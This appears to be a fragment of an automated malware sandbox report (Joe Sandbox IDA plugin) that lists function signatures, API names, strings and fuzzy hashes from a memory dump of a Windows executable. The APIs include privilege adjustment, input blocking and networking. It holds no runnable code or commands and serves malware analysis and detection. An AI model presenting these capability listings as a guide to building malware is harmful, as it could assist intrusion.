                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastinet_addrsocket
                                                                          • String ID:
                                                                          • API String ID: 4170576061-0
                                                                          • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                          • Instruction ID: 900fa3d37881e0bb7f10e24c68d834007f3f02e984cc14fc630b14d13eeda7a8
                                                                          • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                          • Instruction Fuzzy Hash: 33510521B1E66289DB04FB56E404669FB90FB89FE0FC64131EE5D077A6EE3CD4028790
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize
                                                                          • String ID: .lnk
                                                                          • API String ID: 948891078-24824748
                                                                          • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                          • Instruction ID: 75df2f781f42e292df498aed34fb6de577806487b618c765def9b9ad11d8ed5c
                                                                          • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                          • Instruction Fuzzy Hash: 53D18032B1DB5689EB10EB25D4906ADAB60FB80B88FC25031EE4E47B75EE3CD546C750
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _handle_error
                                                                          • String ID: !$VUUU$fmod
                                                                          • API String ID: 1757819995-2579133210
                                                                          • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                          • Instruction ID: 5c67afd6ac098c713ab43e46d739ebe04e23c059bdedb970d86c0029d7754c21
                                                                          • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                          • Instruction Fuzzy Hash: E5B11621A1DFC448D6A79A3454113B6F259EFAA390F91D332E94E36BB0EF2C95838700
                                                                          APIs
                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ADC42D60
                                                                            • Part of subcall function 00007FF7ADC3B184: GetCurrentProcess.KERNEL32(00007FF7ADC3B21D), ref: 00007FF7ADC3B1B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                          • String ID: *$.$.
                                                                          • API String ID: 2518042432-2112782162
                                                                          • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                          • Instruction ID: 33c084e1729b5fec01887537bb7b9cc77cb78105adc615dfe119d83b0e41a49e
                                                                          • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                          • Instruction Fuzzy Hash: 4851E2A6F1AA5588FB10EBA598092BDE2A1FF44BC8FD64035DE0D17B95FE38D0438310
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 1286766494-0
                                                                          • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                          • Instruction ID: 7048b36b01778098a112fe2745d3d08add2bcf06c24c384972d9a526bfabc337
                                                                          • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                          • Instruction Fuzzy Hash: A9A2BF36A0E6428EEB289F28D4501B9F7A1FF44B88FD54135D74D07AA8EF7DD6128720
                                                                          APIs
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7ADC25C43
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 389471666-631824599
                                                                          • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                          • Instruction ID: e7236d3892c19c81df1f54e6fcd33096228f66cb4899fffd6be4b4ac7eb64c0e
                                                                          • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                          • Instruction Fuzzy Hash: E3118F32A2AB429BEB14AB22D6503B973A0FF44345FC14134C64D42A60FF3CE4A5CB20
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-3689287502
                                                                          • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                          • Instruction ID: 37d6068e9b1f0e64895c4579ebb6cd7fde2f428170244bfdb11258dc95071e39
                                                                          • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                          • Instruction Fuzzy Hash: B2E0C92591BF0686EB15AF11E81436463A5FB08B48FC50835C91D45360FF7CE596C260
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID: Variable must be of type 'Object'.
                                                                          • API String ID: 1385522511-109567571
                                                                          • Opcode ID: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                                          • Instruction ID: dd7c53a521ef196edc3c8ff52e299e2a09c010f18cde2f4ae4f81ac9f18a9894
                                                                          • Opcode Fuzzy Hash: 67ca3e7a743f78d31b90d9fea182e781eb55d1361cb2596d54cba276c749d1dc
                                                                          • Instruction Fuzzy Hash: DEC2A236A0E6928AEB60EF15D4502B9B765FB44B88FD64131EA4E477B5EF3CE442C310
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2733932498-0
                                                                          • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                          • Instruction ID: 79784081382ff00097f55b8b526b09c57afeb6494f044e1bf52a427a629e8a22
                                                                          • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                          • Instruction Fuzzy Hash: 9AB1A127B0AB5689EB10EF66D4806ADA761FB48FD4FC65031EE1D477A6EE38D442C310
                                                                          Similarity
                                                                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 2000298826-0
                                                                          • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                          • Instruction ID: a9dce2187e6abdb14dcfee91e87dcce567c818b600a6922f7103874e2892f93d
                                                                          • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                          • Instruction Fuzzy Hash: 26718136B19B418AE700EB21E4443AEB7A5FB88B88FC14131EA4D07769EF7CD506C750
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DEFINE$x
                                                                          • API String ID: 0-4035502692
                                                                          • Opcode ID: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                          • Instruction ID: bf151b03e3793d6b24b6b5e030eb84b765e76f08b665f553a2763fdca807f1c4
                                                                          • Opcode Fuzzy Hash: ef8c6a1001600b964e5fbe2637a07538f3dd4599c6cbe193d186c423f91508d7
                                                                          • Instruction Fuzzy Hash: 7753B032A1D6518EE760EFA5C4406BC77A1FB04B88FD29136DE0957BA4FB38E942C711
                                                                          Similarity
                                                                          • API ID: Init_thread_footer
                                                                          • String ID:
                                                                          • API String ID: 1385522511-0
                                                                          • Opcode ID: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                          • Instruction ID: c94cbf33577d3a049a89a935a8b3cbdfe491e99f52e7650f1840682736083055
                                                                          • Opcode Fuzzy Hash: 60f9666ca451ed35fe8ab7f9d9e10171ddfa37ac04d0aa9f8a10e9c9a443c8f8
                                                                          • Instruction Fuzzy Hash: DC827132A0E6628AEA50EF55D4546B9B3A4FB44B84FD24035EA4D477B4FF3DE442D320
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $[$\
                                                                          • API String ID: 0-3681541464
                                                                          • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                          • Instruction ID: 30fc60df6ecc5790483208af9f38fa58324725f8ea390a792a3b8c13dd1a2d6f
                                                                          • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                          • Instruction Fuzzy Hash: 19B28D32B0A6528EEB24AFA5C4406BC77B1FB44748FD25136DA0D57BA4FB38E842C751
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                          • Instruction ID: 72757cf92eb0c41a8b8d40a7f421ec131a269ccf520bd75ffc522cf798b71282
                                                                          • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                          • Instruction Fuzzy Hash: BF516932609A4689DB14EF25D4902ADB760FB84B94FD24232DB6E437B5EF3CE552C720
                                                                          Similarity
                                                                          • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                          • String ID:
                                                                          • API String ID: 2278415577-0
                                                                          • Opcode ID: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                          • Instruction ID: 8b2134f70d691b0f43b07b5f225c591ffff65f155b04a37ff245bfe26430e1a2
                                                                          • Opcode Fuzzy Hash: 70c4773b18923e0c28b697d59e2b6e62826da89e857526a178f76e4b759ffcd8
                                                                          • Instruction Fuzzy Hash: AB21AC72A0DA818ADB04EF66F44026AB7A0FB88BD4F858435DF4D07728EF78D556C710
                                                                          Similarity
                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 3429775523-0
                                                                          • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                          • Instruction ID: 25480ea6a5bd29db35b34feeda83a47e041cf9c2157f24b6b39de19843e8657f
                                                                          • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                          • Instruction Fuzzy Hash: E0015273A287818FE7108F20E4953AD73B0F75476EF810929E64D86A98DB7DC159CF80
                                                                          Similarity
                                                                          • API ID: Heap$AllocInitializeProcess
                                                                          • String ID:
                                                                          • API String ID: 570334035-0
                                                                          • Opcode ID: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                                          • Instruction ID: fee55283ff15e8bce1d5b4aed22908f2308eca2ec0818a3e6aced2005a7b5851
                                                                          • Opcode Fuzzy Hash: c2212e710faa0aa25c6585764cd3283daba03b8e8a3efd7139333ad593dfd05c
                                                                          • Instruction Fuzzy Hash: B6F01D36A1AB5286D715DB56B04401AB7A0FB88B90B958534DF8943B28EF3CE9958B80
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .
                                                                          • API String ID: 0-248832578
                                                                          • Opcode ID: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                          • Instruction ID: 0713c297cff2bb825fddc4c79148e2668aedc05c8f78c03f53fc71128f7b7dec
                                                                          • Opcode Fuzzy Hash: 704ebd355b677e1258a9e20fb2f824619711b00144154a2c45bc08c04a856543
                                                                          • Instruction Fuzzy Hash: AA313A95B2D69148E720AF62980C676EA52FB90BE4FC58631EE6D07BE5FE3CD4024210
                                                                          Similarity
                                                                          • API ID: ExceptionRaise_clrfp
                                                                          • String ID:
                                                                          • API String ID: 15204871-0
                                                                          • Opcode ID: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                          • Instruction ID: e487f1665d113ba3cba29da3605f90e4042ae566b561b9c4c6c381a26f164fbf
                                                                          • Opcode Fuzzy Hash: 2c887139cc1f69395780bda7c312862f1bbc48349006177215bd8e385e5acab5
                                                                          • Instruction Fuzzy Hash: 75B18EB3606B848FEB15CF29C4493ACBBA1F744B48F958921DA6D837B8DB39D452C710
                                                                          Similarity
                                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                                          • String ID:
                                                                          • API String ID: 599397726-0
                                                                          • Opcode ID: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                          • Instruction ID: a2719d98dd3b7affc00f24714cf82f9278996f7d8d20061804b252010a8be3b3
                                                                          • Opcode Fuzzy Hash: a54c6d4a74e6411871131af3bdbcf589181ad988d0891215d2ce77e29c03cb3f
                                                                          • Instruction Fuzzy Hash: 9031C436B0DA018AFB58EF26C450BFCA795FB84B89FA14435DE0D47BA4EE39D4428310
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                          • String ID:
                                                                          • API String ID: 81990902-0
                                                                          • Opcode ID: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                          • Instruction ID: d4c17d54322fff90dcf83657781000f9bf8ee1ded332abfa5acb44d32ba51456
                                                                          • Opcode Fuzzy Hash: 2696843c0c1c48d019296e0beaf727179f08331fefa667d0a626b5bdda81ebd6
                                                                          • Instruction Fuzzy Hash: 09F0E566A2CA4182EB50EB61E4113B8A360FBD8F88FA00531CE0D07768DF3CC0878220
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: a/p$am/pm
                                                                          • API String ID: 0-3206640213
                                                                          • Opcode ID: b6ff340540ec1a6ec0d6140cfc1c8523425437697bcd52408c2e8c1b88fcdfce
                                                                          • Instruction ID: 90a0a37d764b0132c38c7e58b2224f0a26444c92995bff570b1b3a9816e609f6
                                                                          • Opcode Fuzzy Hash: b6ff340540ec1a6ec0d6140cfc1c8523425437697bcd52408c2e8c1b88fcdfce
                                                                          • Instruction Fuzzy Hash: 5EE1C822A0E6528AE76CAF1481445BDE3B1FF41780FD64231EA1E466E4FF7DE952C720
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: 0$0x%p
                                                                          • API String ID: 3215553584-2479247192
                                                                          • Opcode ID: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                          • Instruction ID: a4d9bc8129d43a03af41e9f384beefc0fa11e9dbc967d9efb944c67b011ed954
                                                                          • Opcode Fuzzy Hash: 2cf1ea9a671600e4e0a2c177b28b5012e25eeeeabff85c4abdd8ee56160d1f52
                                                                          • Instruction Fuzzy Hash: 3A812822A1E6424EEA64BB25824067EA3D0EF40B44FD61531DD0D876B5FF3DE847E721
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Variable is not of type 'Object'.
                                                                          • API String ID: 0-1840281001
                                                                          • Opcode ID: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                                          • Instruction ID: 38fb10e5294b7bf9f9950e9ede7b88915fc05396a5987a892fe5fa7a8bb1b49d
                                                                          • Opcode Fuzzy Hash: 0846f4224996d3c000beb684e8f92ad8a272e358ff67d15cb6cee7ad666ce03d
                                                                          • Instruction Fuzzy Hash: 26524E32A0E6529EEB10EF60C0442FCA7A1EB45788FD24135EA0D576A6EF3DE547C760
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: no error
                                                                          • API String ID: 0-1106124726
                                                                          • Opcode ID: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                          • Instruction ID: e5ff707ccf1567e9a51a02a95ddafadd20616c065ec4eeb3d18e39016c3bbb9f
                                                                          • Opcode Fuzzy Hash: daf22cd7e491b1831c7a4d7ece73bd53412841c2595e7b00d29937dbea50e64a
                                                                          • Instruction Fuzzy Hash: 9212BD72A097918EE724EF65D4402ADB3B0FB44748F915135EA4E47BA4EF38E942C750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
                                                                          • Instruction ID: e835d4ba2db22034fb115a757417044551f65e672d5c447f3a993b19396c957e
                                                                          • Opcode Fuzzy Hash: 8cf4d90d24b710f01b8413e09e10ab0a79a0cee39ea01687b76c1a24c8fffcac
